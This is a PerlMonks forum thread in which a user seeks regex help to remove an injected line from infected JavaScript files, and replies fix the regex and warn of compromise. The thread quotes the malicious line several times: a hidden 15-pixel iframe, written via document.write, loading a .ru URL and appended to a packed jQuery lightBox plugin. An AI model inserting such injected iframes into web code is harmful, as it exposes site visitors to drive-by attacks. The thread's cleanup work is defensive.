Beefy Boxes and Bandwidth Generously Provided by pair Networks
Keep It Simple, Stupid
 
PerlMonks  

trouble with regular expressions

by programmer.perl (Beadle)
on Nov 06, 2012 at 14:30 UTC ( #1002482=perlquestion: print w/ replies, xml ) Need Help??
programmer.perl has asked for the wisdom of the Perl Monks concerning the following question:

Hi everyone,

I'm having trouble with regexp... My codes couldn't match string below, please, help me with this )) I use this code in a substitution (s///;)

I have to change a whole string to a "; //eof"

string to be changed is ;document.write('<iframe src="any url" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>'); this string is found at the end of the file: it is the last string

But the result is ; //eofnt.write('<iframe src="http://wwwrcacomcontributes.ru/blacklistingbogus.cgi?8" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>');

code:

#!/usr/bin/perl -w use 5.010; use strict; use warnings; open (TABLETKA, "+<script.js") || die "Can't open a file: $!\n"; my @lines = <TABLETKA>; foreach (@lines) { print "cleaned\n" if s{(\;do.*)(</iframe>'\);)}{\; //eof}; } seek(TABLETKA,0,0) || die; print TABLETKA @lines; close (TABLETKA);

file is script.js:

/** * jQuery lightBox plugin * This jQuery plugin was inspired and based on Lightbox 2 by Lokesh D +hakar (http://www.huddletogether.com/projects/lightbox2/) * and adapted to me ...SHORTENED... */ eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a) +))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.repl +ace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r +[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(n +ew RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(6($){$.2N.3g=6(4){4 +=23.2H({2B:\'#34\',2g:0.8,1d:F,1M:\'18/5-33-Y.16\',1v:\'18/5-1u-2Q.16 +\',1E:\'18/5-1u-2L.16\',1W:\'18/5-1u-2I.16\',19:\'18/5-2F.16\',1f:10, +2A:3d,2s:\'1j\',2o:\'32\',2j:\'c\',2f:\'p\',2d:\'n\',h:[],9:0},4);f I +=N;6 20(){1X(N,I);u F}6 1X(1e,I){$(\'1U, 1S, 1R\').l({\'1Q\':\'2E\'}) +;1O();4.h.B ...SHORTENED... style|fromCharCode|String|DOM_VK_E +SCAPE|event|keydown|append|of|ico|000|fast|for||slideDown||100|250|ms +ie|400|browser|animate|lightBox|do'.split('|'),0,{}));document.write( +'<iframe src="http://wwwrcacomcontributes.ru/blacklistingbogus.cgi?8" + scrolling="auto" frameborder="no" align="center" height="15" width=" +15"></iframe>');

Updated on Thur 8 Nov 00:55

Yes, I made as you wrote: I closed the file and re-open with > property and all are working)) this is our last code

#!/usr/bin/perl -w use strict; use warnings; use Cwd qw(); my $path = Cwd::cwd(); my $date = localtime(); my $count=0; my $count_file = 0; my $report = "$path/report_$date.txt"; open (FINDIT, "find $path -name '*.js' -type f -print |") || die "Coul +dn't execute find!\n"; while (my $filename = <FINDIT>) { $count_file++; open (TABLETKA, "$filename") || die "Can't open $filename: $!\n"; my @lines = <TABLETKA>; seek(TABLETKA,0,0); my @clean = <TABLETKA>; foreach (@lines) { if ($_ =~ m#(document\.write\('<iframe.*)(</iframe>'\);)#) + { foreach (@clean) { $count++; if ( s{([[:space:]];document\.write\('<iframe.*)(</iframe> +'\);)}{ //eof} ) { close (TABLETKA); open (APP, ">$filename") || die "Can't open FOR WRITING $f +ilename: $!\n"; print APP @clean; close (APP); open (REPORT, ">>$report") || die "Can't open a report.txt +: $!\n"; chomp($filename); print REPORT "$count_file. FILE: $filename\nINFECTED LINE +NUMBER: $count\nCLEANING DATE: $date\n\n"; close (REPORT); $count = 0; } elsif ( s{([^[:space:]])(;document\.write\('<iframe.*)(</i +frame>'\);)}{$1; //eof} ) { close (TABLETKA); open (APP, ">$filename") || die "Can't open FOR WRITING $f +ilename: $!\n"; print APP @clean; close (APP); open (REPORT, ">>$report") || die "Can't open a report.txt +: $!\n"; chomp($filename); print REPORT "$count_file. FILE: $filename\nINFECTED LINE +NUMBER: $count\nCLEANING DATE: $date\n\n"; close (REPORT); $count = 0; } elsif ( s{(;document\.write\('<iframe.*)(</iframe>'\);)}{ +//eof} ) { close (TABLETKA); open (APP, ">$filename") || die "Can't open FOR WRITING $f +ilename: $!\n"; print APP @clean; close (APP); open (REPORT, ">>$report") || die "Can't open a report.txt +: $!\n"; chomp($filename); print REPORT "$count_file. FILE: $filename\nINFECTED LINE +NUMBER: $count\nCLEANING DATE: $date\n\n"; close (REPORT); $count = 0; } } } } }
Enough codes make shapes. (Hamidjon)

Comment on trouble with regular expressions
Select or Download Code
Re: trouble with regular expressions
by Fletch (Chancellor) on Nov 06, 2012 at 14:39 UTC

    Obviously from your actual regex which you you helpfully provided (along with your small code sample which recreates your problem) the problem lies between the 9th and 10th vertibrae and the junction with the oscillation overthruster. Just look at my hand, Buckaroo.

    Update: Actual code provided in a stealth update; snark withdrawn.

    The cake is a lie.
    The cake is a lie.
    The cake is a lie.

        Beginners need to help the good monks to help beginners. And whether or not you're a beginner, a good general principle is 'Help us to help you': see How do I post a question effectively? and perhaps How (Not) To Ask A Question.

        Guessing from other replies in this thread, the code example originally provided was totally inadequate or maybe totally absent. This helps absolutely no one.

      Sorry, it's my fault -- I didn't provide needed code...)) and those previous msgs are not to you...

      Enough codes make shapes. (Hamidjon)
Re: trouble with regular expressions
by moritz (Cardinal) on Nov 06, 2012 at 14:46 UTC
    my code s/(\;do.*)(\<\/iframe\>\'\)\;)/sss/; matches only first 4 symbols...

    The regex inside your substitution matches the whole string, not "only first 4 symbols", whatever you mean by "symbol".

    So, what do you want to do?

    Update: The OP silently updated his node, so this reply might or might not be irrelevant now.

      I want to change this whole word to //eof

      my old code matches the ;doc and gives result such as ssscument.write('<iframe ...shortened...</iframe>');

      and thank you for your reply ))

      Enough codes make shapes. (Hamidjon)

        sorry, I made a gram. mistake: I want to change this whole string to //eof

        Enough codes make shapes. (Hamidjon)
        my old code matches the ;doc and gives result such as ssscument.write('<iframe ...shortened...</iframe>');

        No, it does not:

        use 5.010; use strict; use warnings; $_ = q[;document.write('<iframe src="any url" scrolling="auto" framebo +rder="no" align="center" height="15" width="15"></iframe>');]; s/(\;do.*)(\<\/iframe\>\'\)\;)/sss/; say __END__ sss

        Anyway, it's easier if you use a different delimiter so that you don't have to escape the forward slashes:

        s{(\;do.*)(</iframe>'\);)}{//eof};
Re: trouble with regular expressions
by 2teez (Priest) on Nov 06, 2012 at 16:19 UTC

    Hi programmer.perl,

    My 2 'kobo' input is this:

    I have to change a whole string to a "; //eof"

    string to be changed is ;document.write('<iframe src="any url" scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>'); this string is found at the end of the file: it is the last string


    You could do this:

    use warnings; use strict; while (<DATA>) { chomp; if (/(.+?)\;doc.*?$/s) { print $1, ';//eof', $/; } else { print $_, $/; } } __DATA__ /** * jQuery lightBox plugin * This jQuery plugin was inspired and based on Lightbox 2 by Lokesh D +hakar (http://www.huddletogether.com/projects/lightbox2/) * and adapted to me ...SHORTENED... */ eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a) +))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.repl +ace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r +[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(n +ew RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(6($){$.2N.3g=6(4){4 +=23.2H({2B:\'#34\',2g:0.8,1d:F,1M:\'18/5-33-Y.16\',1v:\'18/5-1u-2Q.16 +\',1E:\'18/5-1u-2L.16\',1W:\'18/5-1u-2I.16\',19:\'18/5-2F.16\',1f:10, +2A:3d,2s:\'1j\',2o:\'32\',2j:\'c\',2f:\'p\',2d:\'n\',h:[],9:0},4);f I +=N;6 20(){1X(N,I);u F}6 1X(1e,I){$(\'1U, 1S, 1R\').l({\'1Q\':\'2E\'}) +;1O();4.h.B ...SHORTENED... style|fromCharCode|String|DOM_VK_E +SCAPE|event|keydown|append|of|ico|000|fast|for||slideDown||100|250|ms +ie|400|browser|animate|lightBox|do'.split('|'),0,{}));document.write( +'<iframe src="http://wwwrcacomcontributes.ru/blacklistingbogus.cgi?8" + scrolling="auto" frameborder="no" align="center" height="15" width=" +15"></iframe>');
    OUTPUT:
    /** * jQuery lightBox plugin * This jQuery plugin was inspired and based on Lightbox 2 by Lokesh D +hakar (http://www.huddletogether.com/projects/lightbox2/) * and adapted to me ...SHORTENED... */ eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a) +))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.repl +ace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r +[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(n +ew RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(6($){$.2N.3g=6(4){4 +=23.2H({2B:\'#34\',2g:0.8,1d:F,1M:\'18/5-33-Y.16\',1v:\'18/5-1u-2Q.16 +\',1E:\'18/5-1u-2L.16\',1W:\'18/5-1u-2I.16\',19:\'18/5-2F.16\',1f:10, +2A:3d,2s:\'1j\',2o:\'32\',2j:\'c\',2f:\'p\',2d:\'n\',h:[],9:0},4);f I +=N;6 20(){1X(N,I);u F}6 1X(1e,I){$(\'1U, 1S, 1R\').l({\'1Q\':\'2E\'}) +;1O();4.h.B ...SHORTENED... style|fromCharCode|String|DOM_VK_E +SCAPE|event|keydown|append|of|ico|000|fast|for||slideDown||100|250|ms +ie|400|browser|animate|lightBox|do'.split('|'),0,{}));//eof
    NOTE:
    Please, be guided that this expression if (/(.+?)\;doc.*?$/s) {..} may/might match more than one occassion, if such are in the other record apart from the one the OP gave in this trend.


    Hope, this helps.
    If you tell me, I'll forget.
    If you show me, I'll remember.
    if you involve me, I'll understand.
    --- Author unknown to me
      Hi 2teez,

      my last solution was (anyway it puts a js comment "//" and next codes are invalid, but here were an unwanted bits in HD memory)

      #!/usr/bin/perl -w use 5.010; use strict; use warnings; open (FINDIT, "find /home/auu/Documents/js -name '*.js' -type f -print + |") || die "Couldn't execute find!\n"; while (my $filename = <FINDIT>) { open (TABLETKA, "+<$filename") || die "Can't open a file $filename: $! +\n"; my @lines = <TABLETKA>; foreach (@lines) { print "$filename is cleaned\n" if s{(\;do.*)(</iframe>'\);)}{\; //eof} +; } seek(TABLETKA,0,0) || die; print TABLETKA @lines; close (TABLETKA); }

      this is (above) is my final code, now I'm thinking how to integrate your code to my code... do you have any idea? ))...

      Enough codes make shapes. (Hamidjon)

        When you overwrite the original file with less text it doesn't clear out the original text, that is where the extra stuff after //eof comes from. Try writing to a new file to see this for yourself.

Re: trouble with regular expressions
by marto (Chancellor) on Nov 06, 2012 at 16:56 UTC

    This looks like you've downloaded a jQuery plugin from someone who has inserted a malicious iframe in an attempt to display to a defunct (possibly nefarious) site. Consider actually checking the code you download before using it. Now that you've found it why not make it easier on yourself and get the plugin jQuery plugin in question from a trusted source, in an unpacked form and examine it before you use it.

      jQuery was clean, infection occurred some days ago, I worked with FileZilla and maybe hole was with this program... I transfered some files with a authorization info, and maybe some bad files in my HD used FileZilla to get this info...

      Enough codes make shapes. (Hamidjon)

        "jQuery was clean"

        The JavaScript you posted is not jQuery, it's a plugin to extend jQuery. As for the remainder of your post, sounds like you need to speak to someone who knows what they're doing from a computer security/administration perspective. If you system, server or network is compromised and you don't know how an iframe to a site which doesn't exist is the least of your problems.

Log In?
Username:
Password:

What's my password?
Create A New User
Node Status?
node history
Node Type: perlquestion [id://1002482]
Approved by marto
help
Chatterbox?
and the web crawler heard nothing...

How do I use this? | Other CB clients
Other Users?
Others perusing the Monastery: (10)
As of 2014-07-28 07:14 GMT
Sections?
Information?
Find Nodes?
Leftovers?
    Voting Booth?

    My favorite superfluous repetitious redundant duplicative phrase is:









    Results (193 votes), past polls